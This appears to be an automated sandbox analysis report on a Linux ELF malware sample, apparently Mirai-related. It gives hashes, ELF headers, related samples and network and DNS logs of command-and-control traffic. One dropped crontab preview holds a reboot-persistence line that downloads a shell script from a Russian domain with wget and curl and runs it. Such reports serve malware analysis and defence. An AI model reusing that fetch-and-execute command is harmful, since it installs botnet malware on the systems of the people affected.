                                                                    INIT7CHboatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                    • 109.202.202.202
                                                                    oovw68w2UV.elfGet hashmaliciousBlackBastaBrowse
                                                                    • 109.202.202.202
                                                                    sshd.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    la.bot.arc.elfGet hashmaliciousMiraiBrowse
                                                                    • 109.202.202.202
                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    .i.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    spc.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 109.202.202.202
                                                                    GECKONET-ASPLx86.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    nsharm.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    nshmips.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    nsharm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    harm4.elfGet hashmaliciousUnknownBrowse
                                                                    • 91.149.218.232
                                                                    botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                    • 91.234.13.57
                                                                    FREE-NET-ASFREEnetEUx86.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    nsharm7.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    nsharm.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    harm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    nshsh4.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    harm4.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 193.233.193.45
                                                                    Rechnung_643839483.pdf.lnkGet hashmaliciousUnknownBrowse
                                                                    • 147.45.44.131
                                                                    LOGOL-ASRUx86.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    nshmpsl.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    nshmips.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    arm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 194.87.198.29
                                                                    https://store.microsoft-surface.ru/noutbuki/surface-laptop-5/surface-laptop-5-15/microsoft-surface-laptop-5-15-i7-8gb-512gb-platinum-metalGet hashmaliciousUnknownBrowse
                                                                    • 176.99.5.94
                                                                    IISz6QDXkY.elfGet hashmaliciousMiraiBrowse
                                                                    • 176.99.9.164
                                                                    No context
                                                                    No context
                                                                    Process:/usr/bin/crontab
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):306
                                                                    Entropy (8bit):5.16446106603911
                                                                    Encrypted:false
                                                                    SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQ3pXEqQDUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jnd/:8QjHig83QgeHLUHYC+GABjnOGAFkz
                                                                    MD5:990AA70CE431A26BA6D8E34357103C54
                                                                    SHA1:668086CE084D63B2522B0F6C3069ED2B11467B6B
                                                                    SHA-256:E7EEDA57727B39509632B5DC6C325737375EF0ED223ADA594F6CB579609270CD
                                                                    SHA-512:6079A750C67453EA7405C514AF22D783C7FF9D3DCAB7A664C2AC6553D1C392AC4013179B9E3B7D94BECEC5FAD5D7D777E0330ED460335B92EB8C312B07E1EF12
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sun Oct 27 02:07:56 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                    File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                                    Entropy (8bit):6.266916675051606
                                                                    TrID:
                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                    File name:x86.elf
                                                                    File size:95'576 bytes
                                                                    MD5:bb9275394716c60d1941432c7085ca13
                                                                    SHA1:43f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
                                                                    SHA256:3c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
                                                                    SHA512:047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d
                                                                    SSDEEP:1536:lDVOLhrwmN92XVNbMxvk2bB3n2GNR9maOY7h8RGEhXXBP:9VO9v4vbMxvkEB3VNR9u4h8RGaxP
                                                                    TLSH:51932A037642C9FFC05BC1B417AB6936CD22FC7E0A36719567D0FEA16A09DE16E2D620
                                                                    File Content Preview:.ELF..............>.......@.....@........r..........@.8...@.......................@.......@......U.......U.......................`.......`Q......`Q.....P........o..............Q.td....................................................H...._....z/..H........

                                                                    ELF header

                                                                    Class:ELF64
                                                                    Data:2's complement, little endian
                                                                    Version:1 (current)
                                                                    Machine:Advanced Micro Devices X86-64
                                                                    Version Number:0x1
                                                                    Type:EXEC (Executable file)
                                                                    OS/ABI:UNIX - System V
                                                                    ABI Version:0
                                                                    Entry Point Address:0x400194
                                                                    Flags:0x0
                                                                    ELF Header Size:64
                                                                    Program Header Offset:64
                                                                    Program Header Size:56
                                                                    Number of Program Headers:3
                                                                    Section Header Offset:94744
                                                                    Section Header Size:64
                                                                    Number of Section Headers:13
                                                                    Header String Table Index:12
                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                    NULL0x00x00x00x00x0000
                                                                    .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                                    .textPROGBITS0x4001000x1000x12fa80x00x6AX0016
                                                                    .finiPROGBITS0x4130a80x130a80xe0x00x6AX001
                                                                    .rodataPROGBITS0x4130c00x130c00x24e00x00x2A0032
                                                                    .eh_framePROGBITS0x4155a00x155a00x40x00x2A004
                                                                    .ctorsPROGBITS0x5160000x160000x100x00x3WA008
                                                                    .dtorsPROGBITS0x5160100x160100x100x00x3WA008
                                                                    .jcrPROGBITS0x5160200x160200x80x00x3WA008
                                                                    .dataPROGBITS0x5160400x160400x5100x00x3WA0032
                                                                    .bssNOBITS0x5165600x165500x6a680x00x3WA0032
                                                                    .commentPROGBITS0x00x165500xc720x00x0001
                                                                    .shstrtabSTRTAB0x00x171c20x560x00x0001
                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                    LOAD0x00x4000000x4000000x155a40x155a46.40230x5R E0x100000.init .text .fini .rodata .eh_frame
                                                                    LOAD0x160000x5160000x5160000x5500x6fc82.69170x6RW 0x100000.ctors .dtors .jcr .data .bss
                                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 27, 2024 08:07:57.595434904 CET43928443192.168.2.2391.189.91.42
                                                                    Oct 27, 2024 08:07:58.139594078 CET553688507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:07:58.145152092 CET85075536831.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:07:58.145210028 CET553688507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:07:58.145231009 CET553688507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:07:58.150640965 CET85075536831.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:07:58.150693893 CET553688507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:07:58.158782959 CET85075536831.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:07:59.227757931 CET85075536831.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:07:59.227811098 CET85075536831.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:07:59.227840900 CET85075536831.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:07:59.227894068 CET553688507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:07:59.227894068 CET553688507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:07:59.227894068 CET553688507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:07:59.227936983 CET553688507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:08:03.226921082 CET42836443192.168.2.2391.189.91.43
                                                                    Oct 27, 2024 08:08:03.994611025 CET4251680192.168.2.23109.202.202.202
                                                                    Oct 27, 2024 08:08:17.560805082 CET43928443192.168.2.2391.189.91.42
                                                                    Oct 27, 2024 08:08:24.253628969 CET553708507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:08:24.259187937 CET85075537031.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:08:24.259275913 CET553708507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:08:24.259275913 CET553708507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:08:24.264797926 CET85075537031.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:08:24.264853001 CET553708507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:08:24.270267963 CET85075537031.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:08:25.237713099 CET85075537031.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:08:25.237762928 CET85075537031.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:08:25.237802029 CET553708507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:08:25.237802029 CET553708507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:08:25.237869024 CET553708507192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:08:29.847151995 CET42836443192.168.2.2391.189.91.43
                                                                    Oct 27, 2024 08:08:33.942543030 CET4251680192.168.2.23109.202.202.202
                                                                    Oct 27, 2024 08:08:45.285717010 CET405304226192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:08:45.291575909 CET42264053091.149.238.18192.168.2.23
                                                                    Oct 27, 2024 08:08:45.291786909 CET405304226192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:08:45.291788101 CET405304226192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:08:45.297483921 CET42264053091.149.238.18192.168.2.23
                                                                    Oct 27, 2024 08:08:45.297693968 CET405304226192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:08:45.303210020 CET42264053091.149.238.18192.168.2.23
                                                                    Oct 27, 2024 08:08:46.127919912 CET42264053091.149.238.18192.168.2.23
                                                                    Oct 27, 2024 08:08:46.128343105 CET405304226192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:08:46.128438950 CET405304226192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:08:51.143845081 CET3513011060192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:08:51.149352074 CET1106035130194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:08:51.149421930 CET3513011060192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:08:51.149440050 CET3513011060192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:08:51.155421972 CET1106035130194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:08:51.155489922 CET3513011060192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:08:51.161094904 CET1106035130194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:08:52.421345949 CET1106035130194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:08:52.421389103 CET1106035130194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:08:52.421469927 CET3513011060192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:08:52.421469927 CET3513011060192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:08:52.421521902 CET3513011060192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:08:57.526181936 CET472087680192.168.2.2381.29.149.178
                                                                    Oct 27, 2024 08:08:57.532020092 CET76804720881.29.149.178192.168.2.23
                                                                    Oct 27, 2024 08:08:57.532242060 CET472087680192.168.2.2381.29.149.178
                                                                    Oct 27, 2024 08:08:57.532242060 CET472087680192.168.2.2381.29.149.178
                                                                    Oct 27, 2024 08:08:57.537844896 CET76804720881.29.149.178192.168.2.23
                                                                    Oct 27, 2024 08:08:57.538067102 CET472087680192.168.2.2381.29.149.178
                                                                    Oct 27, 2024 08:08:57.543900013 CET76804720881.29.149.178192.168.2.23
                                                                    Oct 27, 2024 08:08:58.414297104 CET76804720881.29.149.178192.168.2.23
                                                                    Oct 27, 2024 08:08:58.414635897 CET472087680192.168.2.2381.29.149.178
                                                                    Oct 27, 2024 08:08:58.414635897 CET472087680192.168.2.2381.29.149.178
                                                                    Oct 27, 2024 08:08:58.515172958 CET43928443192.168.2.2391.189.91.42
                                                                    Oct 27, 2024 08:09:03.446145058 CET332844069192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:09:03.451886892 CET40693328431.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:09:03.451986074 CET332844069192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:09:03.452042103 CET332844069192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:09:03.457710981 CET40693328431.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:09:03.457789898 CET332844069192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:09:03.463401079 CET40693328431.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:09:04.396224022 CET40693328431.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:09:04.396374941 CET332844069192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:09:04.396445990 CET332844069192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:09:04.396538019 CET40693328431.13.248.89192.168.2.23
                                                                    Oct 27, 2024 08:09:04.396631956 CET332844069192.168.2.2331.13.248.89
                                                                    Oct 27, 2024 08:09:09.495258093 CET6053413106192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:09.500966072 CET131066053488.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:09.501060009 CET6053413106192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:09.501101017 CET6053413106192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:09.506788969 CET131066053488.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:09.506889105 CET6053413106192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:09.512778997 CET131066053488.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:10.463850975 CET131066053488.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:10.463876963 CET131066053488.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:10.464011908 CET6053413106192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:10.464013100 CET6053413106192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:10.464147091 CET6053413106192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:25.548032999 CET4214413644192.168.2.2391.149.218.232
                                                                    Oct 27, 2024 08:09:25.554003000 CET136444214491.149.218.232192.168.2.23
                                                                    Oct 27, 2024 08:09:25.554223061 CET4214413644192.168.2.2391.149.218.232
                                                                    Oct 27, 2024 08:09:25.554223061 CET4214413644192.168.2.2391.149.218.232
                                                                    Oct 27, 2024 08:09:25.560199976 CET136444214491.149.218.232192.168.2.23
                                                                    Oct 27, 2024 08:09:25.560451984 CET4214413644192.168.2.2391.149.218.232
                                                                    Oct 27, 2024 08:09:25.566430092 CET136444214491.149.218.232192.168.2.23
                                                                    Oct 27, 2024 08:09:26.615081072 CET136444214491.149.218.232192.168.2.23
                                                                    Oct 27, 2024 08:09:26.615283012 CET136444214491.149.218.232192.168.2.23
                                                                    Oct 27, 2024 08:09:26.615292072 CET4214413644192.168.2.2391.149.218.232
                                                                    Oct 27, 2024 08:09:26.615292072 CET4214413644192.168.2.2391.149.218.232
                                                                    Oct 27, 2024 08:09:26.615457058 CET4214413644192.168.2.2391.149.218.232
                                                                    Oct 27, 2024 08:09:31.636189938 CET5426415763192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:31.642128944 CET1576354264194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:31.642358065 CET5426415763192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:31.642359018 CET5426415763192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:31.648155928 CET1576354264194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:31.648389101 CET5426415763192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:31.654058933 CET1576354264194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:32.911432028 CET1576354264194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:32.911490917 CET1576354264194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:32.911751986 CET5426415763192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:32.911751986 CET5426415763192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:32.911752939 CET5426415763192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:37.942991972 CET5217611314192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:37.948506117 CET1131452176194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:37.948601007 CET5217611314192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:37.948601007 CET5217611314192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:37.953982115 CET1131452176194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:37.954051971 CET5217611314192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:37.959336996 CET1131452176194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:39.225910902 CET1131452176194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:39.225934982 CET1131452176194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:39.225955963 CET1131452176194.87.198.29192.168.2.23
                                                                    Oct 27, 2024 08:09:39.226047993 CET5217611314192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:39.226047993 CET5217611314192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:39.226130009 CET5217611314192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:39.226130009 CET5217611314192.168.2.23194.87.198.29
                                                                    Oct 27, 2024 08:09:44.263346910 CET5993021517192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:09:44.268838882 CET215175993091.149.238.18192.168.2.23
                                                                    Oct 27, 2024 08:09:44.268925905 CET5993021517192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:09:44.268971920 CET5993021517192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:09:44.274286032 CET215175993091.149.238.18192.168.2.23
                                                                    Oct 27, 2024 08:09:44.274355888 CET5993021517192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:09:44.279676914 CET215175993091.149.238.18192.168.2.23
                                                                    Oct 27, 2024 08:09:45.106142998 CET215175993091.149.238.18192.168.2.23
                                                                    Oct 27, 2024 08:09:45.106389999 CET5993021517192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:09:45.106389999 CET5993021517192.168.2.2391.149.238.18
                                                                    Oct 27, 2024 08:09:50.144370079 CET601064431192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:50.150016069 CET44316010688.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:50.150100946 CET601064431192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:50.150144100 CET601064431192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:50.155405045 CET44316010688.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:50.155467987 CET601064431192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:50.160737991 CET44316010688.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:51.107994080 CET44316010688.151.195.22192.168.2.23
                                                                    Oct 27, 2024 08:09:51.108165026 CET601064431192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:51.108217955 CET601064431192.168.2.2388.151.195.22
                                                                    Oct 27, 2024 08:09:56.152178049 CET420403024192.168.2.23193.233.193.45
                                                                    Oct 27, 2024 08:09:56.372659922 CET302442040193.233.193.45192.168.2.23
                                                                    Oct 27, 2024 08:09:56.372836113 CET420403024192.168.2.23193.233.193.45
                                                                    Oct 27, 2024 08:09:56.372864962 CET420403024192.168.2.23193.233.193.45
                                                                    Oct 27, 2024 08:09:56.384274006 CET302442040193.233.193.45192.168.2.23
                                                                    Oct 27, 2024 08:09:56.384352922 CET420403024192.168.2.23193.233.193.45
                                                                    Oct 27, 2024 08:09:56.396008968 CET302442040193.233.193.45192.168.2.23
                                                                    Oct 27, 2024 08:09:57.729868889 CET302442040193.233.193.45192.168.2.23
                                                                    Oct 27, 2024 08:09:57.730101109 CET420403024192.168.2.23193.233.193.45
                                                                    Oct 27, 2024 08:09:57.730243921 CET420403024192.168.2.23193.233.193.45
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 27, 2024 08:07:58.046351910 CET3601453192.168.2.23168.235.111.72
                                                                    Oct 27, 2024 08:07:58.138880014 CET5336014168.235.111.72192.168.2.23
                                                                    Oct 27, 2024 08:08:04.230854988 CET4419853192.168.2.2370.34.254.19
                                                                    Oct 27, 2024 08:08:09.237257004 CET5630053192.168.2.23178.254.22.166
                                                                    Oct 27, 2024 08:08:14.242698908 CET5937553192.168.2.23137.220.52.23
                                                                    Oct 27, 2024 08:08:19.248138905 CET4154753192.168.2.23139.84.165.176
                                                                    Oct 27, 2024 08:08:30.240565062 CET3344453192.168.2.23178.254.22.166
                                                                    Oct 27, 2024 08:08:35.246810913 CET3967953192.168.2.2364.176.6.48
                                                                    Oct 27, 2024 08:08:40.253357887 CET3588553192.168.2.235.161.109.23
                                                                    Oct 27, 2024 08:08:45.259629965 CET4482953192.168.2.2351.158.108.203
                                                                    Oct 27, 2024 08:08:45.284497976 CET534482951.158.108.203192.168.2.23
                                                                    Oct 27, 2024 08:08:51.131753922 CET3548253192.168.2.23152.53.15.127
                                                                    Oct 27, 2024 08:08:51.142954111 CET5335482152.53.15.127192.168.2.23
                                                                    Oct 27, 2024 08:08:57.424731016 CET4340253192.168.2.23168.235.111.72
                                                                    Oct 27, 2024 08:08:57.524804115 CET5343402168.235.111.72192.168.2.23
                                                                    Oct 27, 2024 08:09:03.417666912 CET5764653192.168.2.2365.21.1.106
                                                                    Oct 27, 2024 08:09:03.444981098 CET535764665.21.1.106192.168.2.23
                                                                    Oct 27, 2024 08:09:09.399545908 CET4250553192.168.2.23168.235.111.72
                                                                    Oct 27, 2024 08:09:09.494154930 CET5342505168.235.111.72192.168.2.23
                                                                    Oct 27, 2024 08:09:15.467278957 CET5770753192.168.2.235.161.109.23
                                                                    Oct 27, 2024 08:09:20.473723888 CET4973753192.168.2.2370.34.254.19
                                                                    Oct 27, 2024 08:09:25.480031013 CET5222153192.168.2.2380.152.203.134
                                                                    Oct 27, 2024 08:09:25.546974897 CET535222180.152.203.134192.168.2.23
                                                                    Oct 27, 2024 08:09:31.618520975 CET3949553192.168.2.2351.158.108.203
                                                                    Oct 27, 2024 08:09:31.634928942 CET533949551.158.108.203192.168.2.23
                                                                    Oct 27, 2024 08:09:37.914262056 CET3853053192.168.2.23217.160.70.42
                                                                    Oct 27, 2024 08:09:37.941864967 CET5338530217.160.70.42192.168.2.23
                                                                    Oct 27, 2024 08:09:44.229029894 CET4311553192.168.2.23185.181.61.24
                                                                    Oct 27, 2024 08:09:44.262546062 CET5343115185.181.61.24192.168.2.23
                                                                    Oct 27, 2024 08:09:50.109730959 CET3849653192.168.2.23185.181.61.24
                                                                    Oct 27, 2024 08:09:50.143531084 CET5338496185.181.61.24192.168.2.23
                                                                    Oct 27, 2024 08:09:56.111818075 CET4670753192.168.2.23185.181.61.24
                                                                    Oct 27, 2024 08:09:56.151252985 CET5346707185.181.61.24192.168.2.23
                                                                    Oct 27, 2024 08:10:02.732240915 CET4098853192.168.2.2380.152.203.134
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 27, 2024 08:07:58.046351910 CET192.168.2.23168.235.111.720xb212Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:04.230854988 CET192.168.2.2370.34.254.190xe123Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:09.237257004 CET192.168.2.23178.254.22.1660xe45Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:14.242698908 CET192.168.2.23137.220.52.230x5ea0Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:19.248138905 CET192.168.2.23139.84.165.1760xea0cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:30.240565062 CET192.168.2.23178.254.22.1660x835fStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:35.246810913 CET192.168.2.2364.176.6.480x663cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:40.253357887 CET192.168.2.235.161.109.230x2598Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:45.259629965 CET192.168.2.2351.158.108.2030x3840Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:51.131753922 CET192.168.2.23152.53.15.1270x3f44Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:08:57.424731016 CET192.168.2.23168.235.111.720xcad5Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:03.417666912 CET192.168.2.2365.21.1.1060xde20Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:09.399545908 CET192.168.2.23168.235.111.720x1285Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:15.467278957 CET192.168.2.235.161.109.230xe635Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:20.473723888 CET192.168.2.2370.34.254.190xc41eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:25.480031013 CET192.168.2.2380.152.203.1340x2fa7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:31.618520975 CET192.168.2.2351.158.108.2030x43cbStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:37.914262056 CET192.168.2.23217.160.70.420xfd4cStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:44.229029894 CET192.168.2.23185.181.61.240x2608Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:50.109730959 CET192.168.2.23185.181.61.240x73abStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:09:56.111818075 CET192.168.2.23185.181.61.240x860Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:10:02.732240915 CET192.168.2.2380.152.203.1340x93e7Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                    Oct 27, 2024 08:07:58.138880014 CET168.235.111.72192.168.2.230xb212No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
